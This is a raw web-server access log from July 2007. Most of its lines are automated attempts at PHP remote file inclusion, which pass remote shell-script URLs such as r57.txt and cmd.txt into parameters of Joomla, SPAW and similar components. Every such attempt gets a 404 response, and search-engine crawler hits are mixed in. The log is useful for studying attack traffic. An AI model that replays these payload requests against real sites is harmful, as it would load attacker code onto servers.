216.246.60.198 - - [15/Jul/2007:23:28:35 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://tes.275mb.com/bot/hajar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
216.246.60.198 - - [15/Jul/2007:23:28:35 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://tes.275mb.com/bot/hajar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
70.87.59.50 - - [15/Jul/2007:23:28:53 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [15/Jul/2007:23:28:53 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
202.160.178.154 - - [15/Jul/2007:23:31:55 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)"
202.160.178.241 - - [15/Jul/2007:23:32:14 -0700] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "www.galf.org"
204.15.10.144 - - [15/Jul/2007:23:34:57 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://tes.275mb.com/bot/hajar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
204.15.10.144 - - [15/Jul/2007:23:34:57 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://tes.275mb.com/bot/hajar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.106.79.20 - - [15/Jul/2007:23:37:37 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
70.87.59.50 - - [15/Jul/2007:23:38:12 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [15/Jul/2007:23:38:12 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.106.79.20 - - [15/Jul/2007:23:38:53 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
70.87.59.50 - - [15/Jul/2007:23:46:05 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [15/Jul/2007:23:46:05 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.228.98 - - [15/Jul/2007:23:47:02 -0700] "GET /logs/access.log/middle.php?page=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
70.87.59.50 - - [15/Jul/2007:23:47:02 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [15/Jul/2007:23:47:02 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://gipser.altervista.org/let.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [15/Jul/2007:23:47:02 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [15/Jul/2007:23:47:02 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://gipser.altervista.org/let.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.228.98 - - [15/Jul/2007:23:47:10 -0700] "GET /middle.php?page=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.228.98 - - [15/Jul/2007:23:47:18 -0700] "GET /logs/middle.php?page=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [15/Jul/2007:23:51:56 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [15/Jul/2007:23:51:56 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.251.10.30 - - [15/Jul/2007:23:56:10 -0700] "GET /sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://suntikan.org/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:00:02:25 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:00:02:25 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://gipser.altervista.org/let.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:00:02:25 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:00:02:25 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://gipser.altervista.org/let.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.10.137.17 - - [16/Jul/2007:00:03:09 -0700] "GET /logs//public/displayCategory.php?basepath=http://www.ricksa.xpgplus.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.10.137.17 - - [16/Jul/2007:00:03:09 -0700] "GET //public/displayCategory.php?basepath=http://www.ricksa.xpgplus.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.19.79 - - [16/Jul/2007:00:03:11 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.25.205 - - [16/Jul/2007:00:03:12 -0700] "GET /logs/access_070716.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:00:03:40 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:00:03:40 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://gipser.altervista.org/let.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:00:03:40 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:00:03:41 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://gipser.altervista.org/let.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.23.229 - - [16/Jul/2007:00:04:56 -0700] "GET /cendoc/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.19.228.98 - - [16/Jul/2007:00:05:10 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.28.105 - - [16/Jul/2007:00:05:22 -0700] "GET /cendoc/?N=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.28.220 - - [16/Jul/2007:00:05:28 -0700] "GET /cendoc/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.23.232 - - [16/Jul/2007:00:07:39 -0700] "GET /cendoc/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:00:07:55 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:00:07:55 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://gipser.altervista.org/let.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
70.87.59.50 - - [16/Jul/2007:00:07:55 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:00:07:56 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://gipser.altervista.org/let.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.20.70 - - [16/Jul/2007:00:15:29 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.19.228.98 - - [16/Jul/2007:00:19:07 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.228.98 - - [16/Jul/2007:00:19:15 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
67.19.228.98 - - [16/Jul/2007:00:19:24 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.10.137.17 - - [16/Jul/2007:00:27:51 -0700] "GET /logs/access.log//public/displayCategory.php?basepath=http://www.ricksa.xpgplus.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.24.220 - - [16/Jul/2007:00:29:46 -0700] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.24.213 - - [16/Jul/2007:00:30:00 -0700] "GET /tmp/?S=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.19.228.98 - - [16/Jul/2007:00:33:58 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.144.201.247 - - [16/Jul/2007:00:34:07 -0700] "GET /sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.rushingrentners.com/extern/neue/img/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.144.201.247 - - [16/Jul/2007:00:34:07 -0700] "GET /sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.rushingrentners.com/extern/neue/img/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.144.201.247 - - [16/Jul/2007:00:34:09 -0700] "GET /sohoadmin/includes/webmaster/product_update.php?_SESSION[docroot_path]=http://www.rushingrentners.com/extern/neue/img/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.144.201.247 - - [16/Jul/2007:00:34:26 -0700] "GET /sohoadmin/program/webmaster/product_update.php?_SESSION[docroot_path]=http://www.rushingrentners.com/extern/neue/img/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.25.102 - - [16/Jul/2007:00:38:51 -0700] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
66.90.118.254 - - [16/Jul/2007:00:39:52 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.90.118.254 - - [16/Jul/2007:00:39:52 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:00:39:54 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
70.87.59.50 - - [16/Jul/2007:00:39:55 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.144.201.247 - - [16/Jul/2007:00:42:34 -0700] "GET //Gallery/displayCategory.php?basepath=http://www.rushingrentners.com/extern/neue/img/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:00:50:27 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:00:50:27 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
192.154.46.35 - - [16/Jul/2007:00:50:33 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://flackster.org/photos/myadmin/temp/.,/.,/.,/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
192.154.46.35 - - [16/Jul/2007:00:50:35 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://flackster.org/photos/myadmin/temp/.,/.,/.,/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:00:55:29 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:00:55:29 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://gipser.altervista.org/let.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:00:55:29 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:00:55:29 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://gipser.altervista.org/let.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.106.79.20 - - [16/Jul/2007:00:58:02 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.31.151.19 - - [16/Jul/2007:01:00:10 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.glorialsexo.com/images/f22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.233.134.199 - - [16/Jul/2007:01:00:24 -0700] "GET /logs/index.php?go=http://trust1.altervista.org/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.233.134.199 - - [16/Jul/2007:01:00:25 -0700] "GET /index.php?go=http://trust1.altervista.org/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.3.119.228 - - [16/Jul/2007:01:03:55 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://bandwith.netfast.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:01:04:09 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:01:04:09 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.208.91.108 - - [16/Jul/2007:01:08:41 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.208.91.108 - - [16/Jul/2007:01:08:42 -0700] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:01:09:35 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:01:09:36 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://gipser.altervista.org/let.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:01:09:36 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:01:09:36 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://gipser.altervista.org/let.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.154.222 - - [16/Jul/2007:01:12:50 -0700] "GET /index1.php?p=http://www.rpgnet.com/images/m4f14d3c4lc1nh4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.50.44.253 - - [16/Jul/2007:01:14:35 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.glorialsexo.com/images/f22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
65.55.212.144 - - [16/Jul/2007:01:16:08 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.212.144 - - [16/Jul/2007:01:16:08 -0700] "GET /logs/access.log HTTP/1.0" 200 118858 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
87.3.119.228 - - [16/Jul/2007:01:16:53 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.nykola.ch/Sefirot_r0x/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.3.119.228 - - [16/Jul/2007:01:16:54 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.nykola.ch/Sefirot_r0x/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:01:17:29 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:01:17:29 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://gipser.altervista.org/let.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
70.87.59.50 - - [16/Jul/2007:01:17:30 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:01:17:30 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://gipser.altervista.org/let.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.255.48.112 - - [16/Jul/2007:01:27:10 -0700] "GET /index.php?con=http://www.roughmix.to/ico/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
66.249.73.202 - - [16/Jul/2007:01:29:34 -0700] "GET /logs/access_070716.log HTTP/1.1" 200 2587370 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
74.6.68.39 - - [16/Jul/2007:01:31:59 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.74.39 - - [16/Jul/2007:01:32:28 -0700] "GET /LABIA23/index.htm HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.17.46 - - [16/Jul/2007:01:33:26 -0700] "GET /tmp/?N=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:01:33:40 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.3.119.228 - - [16/Jul/2007:01:35:54 -0700] "GET /logs/announcements.php?phpraid_dir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.3.119.228 - - [16/Jul/2007:01:35:55 -0700] "GET /announcements.php?phpraid_dir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.149.225.96 - - [16/Jul/2007:01:36:22 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.glorialsexo.com/images/f22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.19.79 - - [16/Jul/2007:01:42:52 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.26.203 - - [16/Jul/2007:01:42:53 -0700] "GET /?S=D HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.65.222 - - [16/Jul/2007:01:43:25 -0700] "GET /labia/ HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
68.142.212.190 - - [16/Jul/2007:01:44:27 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.galf.org"
67.19.228.98 - - [16/Jul/2007:01:45:11 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
203.208.91.108 - - [16/Jul/2007:01:46:34 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.208.91.108 - - [16/Jul/2007:01:46:34 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.138.18 - - [16/Jul/2007:01:47:26 -0700] "GET /logs/index2.php?url_page=http://www.ricksa.xpgplus.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.138.18 - - [16/Jul/2007:01:47:27 -0700] "GET /index2.php?url_page=http://www.ricksa.xpgplus.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.233.105.52 - - [16/Jul/2007:01:51:54 -0700] "GET /logs/index.php?go=http://gak-pake.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.233.105.52 - - [16/Jul/2007:01:51:54 -0700] "GET /index.php?go=http://gak-pake.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
207.58.152.199 - - [16/Jul/2007:01:55:08 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://trust1.altervista.org/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.58.152.199 - - [16/Jul/2007:01:55:09 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://trust1.altervista.org/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
66.101.195.2 - - [16/Jul/2007:01:55:24 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.nykola.ch/Sefirot_r0x/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.101.195.2 - - [16/Jul/2007:01:55:25 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.nykola.ch/Sefirot_r0x/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.228.98 - - [16/Jul/2007:02:00:48 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.19.235 - - [16/Jul/2007:02:06:15 -0700] "GET /logs/access_070226.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:02:06:25 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:02:06:25 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://gipser.altervista.org/let.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.126.219.187 - - [16/Jul/2007:02:13:15 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.126.219.187 - - [16/Jul/2007:02:13:15 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
